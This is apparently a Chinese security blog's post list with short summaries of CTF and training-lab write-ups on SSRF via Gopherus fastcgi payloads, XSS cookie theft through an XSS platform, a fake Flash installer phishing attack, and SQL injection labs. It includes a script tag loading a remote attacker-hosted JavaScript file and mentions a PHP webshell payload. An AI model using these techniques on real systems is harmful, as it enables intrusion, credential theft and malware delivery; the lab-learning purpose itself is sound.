自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(8)
  • 收藏
  • 关注

原创 CTFHub-SSRF解析合集

1.打开靶场和kali,在kali上打开 Gopherus-master 工具运行, 由于题目为 fastcgi 协议,所以指定 fastcgi, 提交一个靶场内的php文件地址,建议为默认的 index.php ,输入一句话木马,生成payload。1.打开靶场和kali,在kali上打开 Gopherus-master 工具运行, 由于题目为 fastcgi 协议,所以指定 fastcgi, 提交一个靶场内的php文件地址,建议为默认的 index.php ,输入一句话木马,生成payload。

2024-07-24 20:20:04 502

原创 xss 平台获取管理员cookie

https://xssaq.com/dashboard

2024-07-23 20:24:15 72

原创 xss flash 钓鱼获取主机控制权

注:改名是因为 index.html 代码中点击下载的路径为 ./flashcenter_pp_ax_install_cn.exe 相比较改文件中不知道有几处的代码,直接改名更轻松。注:修改完后图标未变可能是因为有缓存,将其拉倒桌面或在index.html点击下载后发现图标改变。<script src="http://物理机ip/1.js"></script>点击下载,完成后进行安装,发现 kali 成功监听。将压缩后的安装包拖入软件,替换图标后保存。将原安装包拖入软件,保存其图标至桌面。

2024-07-23 20:22:16 410

原创 sqli-labs靶场攻略合集

sqli-labs靶场攻略合集

2024-07-22 20:24:51 154

原创 墨者学院-SQL注入漏洞测试(登录绕过)解析

1.打开靶场,发现是登录页面,并且没有其他页面,直接抓包并发送重放器2.题目说明蹦数据库使用管理员用户,且密码复杂,所以直接在用户名处注入3.闭合后,由于账户正确,整条语句正确,所以无需密码,直接登录到了后台

2024-07-22 19:41:05 155

原创 墨者学院-SQL手工注入漏洞测试(Db2数据库)解析

由于是Db2数据库,所以当查询不到列时,直接指定列名,根据ID猜测name与password为大写,若未查到,可换username,userpassword等。通过题目得知本题为Db2数据库,故得知数据库为 DB2INST1。切记查询时带上ID一起查询,否则查出的数据是错误的,无法登陆。

2024-07-22 19:38:06 261

原创 墨者学院-SQL注入漏洞测试(POST)解析

正常流程应该是查到回显点后,在其位置查所在数据库,数据表,列名以获取账号密码登录后获取 key ,但这里不知道为什么直接登录到了后台,直接获取了key。注:此处不可使用 --+ 闭合, + 会被识别为空格,由于账号栏后方为空,空格会被省略,使用 # 即可。order by 3 未报错,order by 4 报错,证明有三列数据。在name之后加单引号引起报错,则name可作为注入点。

2024-07-22 19:35:00 173

原创 墨者学院-SQL手工注入漏洞测试(MySQL数据库)注入流程

1.购买靶场后访问2.寻找带参数的页面3.查库4.查表5.查数据6.解码7.登录

2024-07-22 11:59:08 129

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除